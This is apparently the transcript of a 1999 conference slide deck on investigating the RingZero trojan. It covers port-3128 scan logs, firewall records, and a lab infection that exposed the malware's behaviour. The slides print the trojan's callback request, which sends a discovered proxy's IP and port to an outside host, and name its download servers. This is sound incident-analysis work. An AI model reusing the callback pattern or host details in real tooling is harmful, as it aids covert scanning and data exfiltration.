The Hunt for RingZero The Hunt For RingZero John Green [email protected].

The Hunt for RingZero

The Hunt For

RingZero

John [email protected]


Outline

• A word about Trojans• Getting a clue• Looking for data• How many source hosts?• The hunt for the Trojan• Game over• BoF Findings


Trojans

This is Roland’s home computer, connected to an ISP


Trojans

“Driving the Bus”, NETBUS


Deep Throat - 2140

200.31.13.8 > 158.12.110.1.2140: udp 24500 001e e104 0000 7111 8795 ac14 0d08coa8 6e01 ea60 085c 000a fbb7 3030 80800001 0001 0000 0000 0664 6f6e 616c

200.31.13.8 > 158.12.110.2.2140: udp 24500 001e e204 0000 7111 8694 ac14 0d08coa8 6e02 ea60 085c 000a fbb6 3030 00000001 0000 0000 0000 0331 3831 0231


Trojans Review

• The most well known trojan programs are Netbus and Back Orifice

• Protective tools include: all major anti-virus tools, nuke nabber, NFR’s Back Officer Friendly and AtGuard


Getting A Clue

• Sept 19, 1999 Roland Grefer writes with an AtGuard detect from his home.com cablemodem

• We both commented that probes to tcp port 3128 are not that common


At Guard http://www.atguard.com


More Clues

• Sept 21, 1999 - SHADOW analyst Adena Bushrod reports similar activity

• Contact other organizations:MITRE, ARL

• They see it too!


Proxy Scanning

08:58:35 ghostrid3r.1606 > 192.168.2.1.80: S(0)08:58:36 ghostrid3r.1607 > 192.168.2.1.8080: S(0)08:58:37 ghostrid3r.1609 > 192.168.2.1.3128: S(0)


How Big Is This Thing?!

Intrusion detection systems ranging from home computers with cable modems to high end government facilities have been reporting a large number of probes to TCP port 3128, the squid proxy service. If your site has a network monitoring capability and you DO NOT run squid and you detect this pattern over the next two weeks, please let us know by sending email to [email protected] with intrusion 3128 in the subject line. If you are allowed to send the data trace, please sanitize any of your site's network information (destination host address) and send the data trace as well. Thank you!

BIG!


Over 300 3128 MessagesIn Three Days

29;23Sep1999; 7:59:21;xxx.yyy.79.141;log;reject;;E100B1;inbound;tcp;203.98.30.10;xxx.yyy.149.44;3128;64052;48;25;30;23Sep1999; 7:59:24;xxx.yyy.79.141;log;reject;;E100B1;inbound;tcp;203.98.30.10;xxx.yyy.149.44;3128;64053;48;25;31;23Sep1999; 8:07:30;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;196.15.173.2;xxx.yyy.214.101;3128;64025;44;48;32;23Sep1999; 8:24:05;xxx.yyy.79.141;log;reject;;E100B1;inbound;tcp;209.203.121.119;xxx.yyy.124.154;3128;3820;48;25;33;23Sep1999; 8:24:11;xxx.yyy.111.133;log;reject;;E100B1;inbound;tcp;194.51.132.171;xxx.yyy.170.248;3128;1195;44;25;34;23Sep1999; 8:59:23;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;156.46.64.149;xxx.yyy.135.194;3128;2570;44;48;35;23Sep1999; 9:00:49;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;194.51.132.171;xxx.yyy.214.228;3128;2932;44;48;36;23Sep1999; 9:14:51;xxx.yyy.111.133;log;reject;;E100B1;inbound;tcp;195.44.9.20;xxx.yyy.95.90;3128;1089;44;25;37;23Sep1999; 9:33:38;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;212.130.192.222;xxx.yyy139.66;3128;2678;48;48;38;23Sep1999; 9:40:13;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;193.125.239.105;xxx.yyy.1.31;3128;1531;48;48;39;23Sep1999; 9:56:08;xxx.yyy.167.253;log;drop;;qfe0;inbound;tcp;194.249.154.21;xxx.yyy.27.35;3128;2515;44;48;40;23Sep1999; 9:57:40;xxx.yyy.79.141;log;reject;;E100B1;inbound;tcp;200.14.243.166;xxx.yyy.123.25;3128;4879;48;25;

Over 1000 Source Hosts!


What Are The Possibilities?> 1000 Source Hosts

• Spoofed• Worlds largest coordinated

attack• Trojan software or “malware”


Source Host Analysis

“I am almost certain that these are indeed live, non-spoofedhosts. First, I've dumped the tcpdump traffic with the arrivingTTL values. I've done about a dozen traceroutes back to thesource IP's and the hop counts are believably close. Also, other clues found in the tcpdump output itself appear topoint to different hosts or a very wise crafter. “

Judy Novak - ARL


The First Hot Tip - Sept 23

get http://www.rusftpsearch.net/cgi-bin/pst.pl/?pst mode = writeip&pst host=192.168.2.1&pstport=3128

“We began receiving probes to 3128 on Wednesday, September 15th.The probes come in a triplet - first to TCP port 80, then 8080,then 3128. The probes appear to be going after random addresses.One finally hit a web server listening on port 80 so I got to seewhat it was doing. It sent the following request to the server:”

Anonymous

Later verified by four other sources.


So What?

“Just a couple additional pieces of information. I only probed backin a rather simple way about 5 machines and found none of thoserunning finger, SMTP or FTP, though all were running TCP port 139,so I concluded (with a very small sample size) it was a Windowsattack of some kind, though I admit this is a guess based onsketchy information.”

Anonymous


Game Over?

“I am the Network Security Officer at Vanderbilt University. I have a system that was infected with a trojan called RingZero and was scanningfor ports 80, 8080, and 3128. I have pieces of the code specifically afile called its.exe and a file that was Ring0.vxd. I am still trying to find the original infected file and I suspect that it was a screen saver. If you would like more info give me a call.”

Ron Marcum, Vanderbilt


Extreme BoF -Decoding RingZero

7PM - 2AM

My Thanks To All Involved!


Basic Game Plan

• Move the Vanderbilt files to a “safe” platform for examination

• Use strings and other unix utilities to examine the files

• Targeting mechanism was a primary interest


Hour 1 - Gameplan Deviation

• Strings, etc didn’t get us too far

• RingZero uses Ian Luck’s “Petite” program to compress the executables

• Tim White volunteers to sacrifice his windows laptop


Hour 2 - Deliberate Infection

• Created a mini-network

• 2 computers, both running sniffers

• Unzipped the archive

• Two files: its.exe, pst.exe– it was a “coin-toss”


Hour 3 - Examining ITS.EXE

• Ran its.exe– removed itself from the desktop– its.exe and Ring0.xvd placed in \

windows\system directory– created an empty its.dat file

• No network activity….. :(


Traffic At Last!

• After rebooting, the infected machine started doing DNS queries for hosts named:

phzforum.virtualave.netxoom.members.com

Now we’re getting somewhere!


So What Now?

• Created an entry in the infected machine’s hosts file– Gave it the ip address of the sniffer

• Infected machine started sending web requests on port 80


Hours 4 and 5 - Reconfiguring the Sniffer

Machine• Switched to Linux• Ran Apache and tcpdump• Apache logs showed that its.exe

was trying to retrieve an its.dat file from the webservers– phzforum.virtualave.net/its.dat– xoom.members.com/harmer/its.dat


What Should Be In ITS.DAT?

• its.dat no longer existed on phzforum.virtualave.net

• Terminal room closed before we discovered the xoom.members.com connection

• its.dat was found the following morning, but it is encrypted?


Party Over? - Nope!

• Getting very late• Oak Room closed• Remaining BoF members

relocated to a corner, downstairs in LaSalle’s


Hours 6 and 7 Running The PST.EXE File

• Ran PST.EXE• Initial behavior was the same

as the its.exe– relocated itself, etc.

PST.EXE spewed packets to ports 80, 8080, and 3128!


PST.EXE Behavior

• Generated a small list of “random?” IP addresses

• Scanned all IPs for port 80, then 8080, and finally 3128

• Repeated


What Is It Doing Though?

• Since the scan was sequential, we were able to configure apache “on-the-fly” to answer web requests for IPs in the scan.

• Examining the Apache logs showed what we had hoped for:


The End Game

get http://www.rusftpsearch.net/cgi-bin/pst.pl/?pst mode = writeip&pst host=192.168.2.1&pstport=3128

The proxy is being used to send its own IP address and proxy port

home to the “mothership” !


Review of Findings

• ITS.EXE attempts to retrieve files from various webservers

• PST.EXE is the active scanner– doesn’t require the its.dat file to run– discovered proxies send their IPs to

www.rusftpsearch.net


Questions Still Remain

• Infection mechanism?

• How does it start at boot time?

• What is the its.dat file for?– Targeting– Scan intensity dial– Attack configuration


Implications?

Quantum leap in distributed attack technology

• Viral infection rates• Configurable - its.dat

– scanning -> attacking?

• Automatic result consolidation


Thank you

The Hunt for RingZero The Hunt For RingZero John Green [email protected].

Documents

Transcript of The Hunt for RingZero The Hunt For RingZero John Green [email protected].